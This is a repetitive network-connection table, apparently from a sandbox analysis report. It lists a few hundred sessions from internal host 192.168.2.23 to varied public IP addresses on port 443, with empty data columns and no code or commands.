                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13095192.168.2.2354370167.3.122.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13096192.168.2.2351508201.113.144.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13097192.168.2.233288682.146.99.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13098192.168.2.2337474129.73.22.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13099192.168.2.233403072.107.10.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13100192.168.2.234992636.151.28.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13101192.168.2.2335968186.159.249.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13102192.168.2.2346424148.197.69.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13103192.168.2.235745290.3.83.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13104192.168.2.2335244189.29.116.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13105192.168.2.2342032180.164.247.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13106192.168.2.234626674.156.104.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13107192.168.2.233375619.20.113.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13108192.168.2.2342432133.65.83.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13109192.168.2.2339014159.59.10.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13110192.168.2.2341670116.238.74.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13111192.168.2.234013631.24.88.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13112192.168.2.2337706159.45.8.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13113192.168.2.234052013.52.165.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13114192.168.2.23524428.198.181.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13115192.168.2.2349178102.29.188.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13116192.168.2.2357496216.249.237.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13117192.168.2.235003276.229.131.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13118192.168.2.23390881.56.101.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13119192.168.2.2352972147.109.93.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13120192.168.2.235616220.85.241.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13121192.168.2.2354262156.40.53.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13122192.168.2.2350664141.169.89.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13123192.168.2.2358934163.198.160.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13124192.168.2.2334742148.215.93.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13125192.168.2.23487804.255.83.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13126192.168.2.235227692.177.188.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13127192.168.2.2335648122.162.170.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13128192.168.2.2351836158.220.224.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13129192.168.2.234082634.22.122.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13130192.168.2.2335038151.8.80.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13131192.168.2.235085435.100.180.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13132192.168.2.23358064.170.31.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13133192.168.2.2353614100.150.31.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13134192.168.2.2334300119.52.39.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13135192.168.2.234313278.101.61.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13136192.168.2.2352828169.239.92.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13137192.168.2.2355208206.219.100.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13138192.168.2.2333300157.78.36.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13139192.168.2.236095880.232.27.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13140192.168.2.2360118210.199.1.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13141192.168.2.2359620219.228.68.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13142192.168.2.233647043.252.72.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13143192.168.2.23419561.160.116.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13144192.168.2.235567673.80.87.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13145192.168.2.234286668.101.19.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13146192.168.2.2339352134.120.12.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13147192.168.2.235989698.214.101.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13148192.168.2.2347914162.237.232.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13149192.168.2.2343288115.234.83.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13150192.168.2.2354764119.243.237.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13151192.168.2.23498921.214.235.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13152192.168.2.234891241.117.77.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13153192.168.2.234164848.154.116.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13154192.168.2.235007646.109.188.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13155192.168.2.2338662183.101.10.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13156192.168.2.235153279.116.204.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13157192.168.2.2357176115.97.156.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13158192.168.2.236085457.40.2.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13159192.168.2.233300013.147.47.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13160192.168.2.2354596101.16.153.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13161192.168.2.2356818185.49.177.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13162192.168.2.235732884.47.30.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13163192.168.2.234398450.65.8.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13164192.168.2.235132219.78.243.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13165192.168.2.2336074151.240.193.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13166192.168.2.234449235.40.24.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13167192.168.2.233659434.244.107.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13168192.168.2.234407420.222.16.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13169192.168.2.2337086175.89.110.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13170192.168.2.2354644108.156.200.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13171192.168.2.235227844.234.61.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13172192.168.2.2356630162.79.234.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13173192.168.2.2358538122.238.19.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13174192.168.2.2341012118.237.196.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13175192.168.2.2335692156.193.77.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13176192.168.2.2341214143.101.125.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13177192.168.2.2355048191.121.176.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13178192.168.2.2342780138.246.243.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13179192.168.2.2349516178.70.81.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13180192.168.2.2336860166.56.251.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13181192.168.2.2333828167.44.92.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13182192.168.2.2357234143.101.194.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13183192.168.2.2348312195.217.69.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13184192.168.2.2358780117.218.218.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13185192.168.2.2340358119.141.40.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13186192.168.2.234255876.179.13.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13187192.168.2.2339932116.130.254.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13188192.168.2.2341208102.251.113.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13189192.168.2.2355106128.43.54.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13190192.168.2.2346956210.154.119.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13191192.168.2.2341298202.228.196.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13192192.168.2.2343172145.19.141.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13193192.168.2.2355762209.193.131.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13194192.168.2.2354070177.186.108.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13195192.168.2.2351934145.95.232.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13196192.168.2.2353596103.78.106.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13197192.168.2.233879434.178.6.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13198192.168.2.234913280.2.206.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13199192.168.2.235773859.212.233.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13200192.168.2.2341304157.231.163.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13201192.168.2.234872634.68.143.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13202192.168.2.2348970159.79.191.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13203192.168.2.233857250.106.39.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13204192.168.2.234282619.78.138.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13205192.168.2.2357834186.35.130.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13206192.168.2.2346382113.15.254.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13207192.168.2.2335782205.1.31.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13208192.168.2.2339596216.45.33.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13209192.168.2.233744625.122.105.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13210192.168.2.2345694102.66.23.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13211192.168.2.235449085.233.167.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13212192.168.2.2360244201.232.25.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13213192.168.2.2354574113.104.84.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13214192.168.2.2360578149.207.107.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13215192.168.2.235553483.21.17.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13216192.168.2.233592257.49.9.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13217192.168.2.2354664203.31.25.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13218192.168.2.2342544103.155.184.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13219192.168.2.2336200112.197.203.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13220192.168.2.234045087.5.161.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13221192.168.2.235917257.62.163.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13222192.168.2.234255075.210.211.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13223192.168.2.2348950164.7.101.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13224192.168.2.235781696.87.98.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13225192.168.2.235984848.212.129.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13226192.168.2.2339792168.25.58.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13227192.168.2.2355156117.106.137.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13228192.168.2.2349152110.186.235.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13229192.168.2.2336198117.1.229.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13230192.168.2.234049882.202.178.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13231192.168.2.235754643.197.97.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13232192.168.2.234200862.137.146.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13233192.168.2.235274866.228.66.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13234192.168.2.2335866173.40.161.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13235192.168.2.2354032139.190.54.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13236192.168.2.233693482.225.196.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13237192.168.2.2333132118.174.213.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13238192.168.2.2344778181.156.14.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13239192.168.2.2349638132.214.214.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13240192.168.2.234052078.195.57.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13241192.168.2.235846025.65.102.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13242192.168.2.235246420.71.131.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13243192.168.2.2335734180.129.41.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13244192.168.2.235682691.61.207.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13245192.168.2.23590244.200.196.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13246192.168.2.2333832210.69.254.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13247192.168.2.235609838.243.12.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13248192.168.2.2333666218.21.36.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13249192.168.2.235393454.149.171.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13250192.168.2.2348486223.152.175.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13251192.168.2.233808225.53.96.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13252192.168.2.2335988113.246.19.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13253192.168.2.2358238136.44.85.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13254192.168.2.2355982167.96.26.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13255192.168.2.2332842193.233.162.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13256192.168.2.235519484.127.166.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13257192.168.2.2350418150.147.53.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13258192.168.2.233530671.238.47.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13259192.168.2.2346196132.29.131.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13260192.168.2.2359732154.218.224.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13261192.168.2.2338994178.178.236.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13262192.168.2.2346880158.228.126.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13263192.168.2.234139673.235.164.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13264192.168.2.2350760223.224.38.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13265192.168.2.235092448.200.150.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13266192.168.2.2340402196.20.90.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13267192.168.2.2353578107.215.85.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13268192.168.2.2353586111.115.182.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13269192.168.2.234484847.226.237.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13270192.168.2.234381299.213.48.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13271192.168.2.2334442186.1.4.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13272192.168.2.235479075.236.88.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13273192.168.2.2356068147.79.87.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13274192.168.2.2342394175.222.109.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13275192.168.2.2353058201.169.113.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13276192.168.2.2336726133.195.155.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13277192.168.2.2360056167.79.219.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13278192.168.2.235024069.74.77.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13279192.168.2.234870473.250.7.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13280192.168.2.2337282206.218.161.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13281192.168.2.2355676197.79.15.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13282192.168.2.2357612156.122.51.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13283192.168.2.2333028118.218.117.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13284192.168.2.233571876.55.190.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13285192.168.2.2333742150.148.28.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13286192.168.2.2340752105.164.2.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13287192.168.2.2356454133.204.52.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13288192.168.2.235985267.54.198.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13289192.168.2.2351404186.237.47.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13290192.168.2.235391090.70.115.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13291192.168.2.235279062.46.158.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13292192.168.2.2340824180.137.79.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13293192.168.2.234729475.130.244.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13294192.168.2.233753081.229.30.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13295192.168.2.234908280.156.245.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13296192.168.2.2351692181.76.85.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13297192.168.2.2353900203.37.252.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13298192.168.2.233617062.85.154.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13299192.168.2.2353404106.83.109.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13300192.168.2.2360698143.18.37.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13301192.168.2.2347666145.62.220.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13302192.168.2.234960217.187.254.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13303192.168.2.2351278128.154.106.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13304192.168.2.2355564102.21.111.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13305192.168.2.235362061.61.213.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13306192.168.2.2336516101.136.253.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13307192.168.2.2350850146.214.112.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13308192.168.2.2333778101.75.233.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13309192.168.2.23472849.90.76.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13310192.168.2.233484678.174.195.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13311192.168.2.2352680204.153.170.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13312192.168.2.2335276167.101.35.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13313192.168.2.233564066.181.149.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13314192.168.2.2353962114.32.190.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13315192.168.2.2336692198.169.154.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
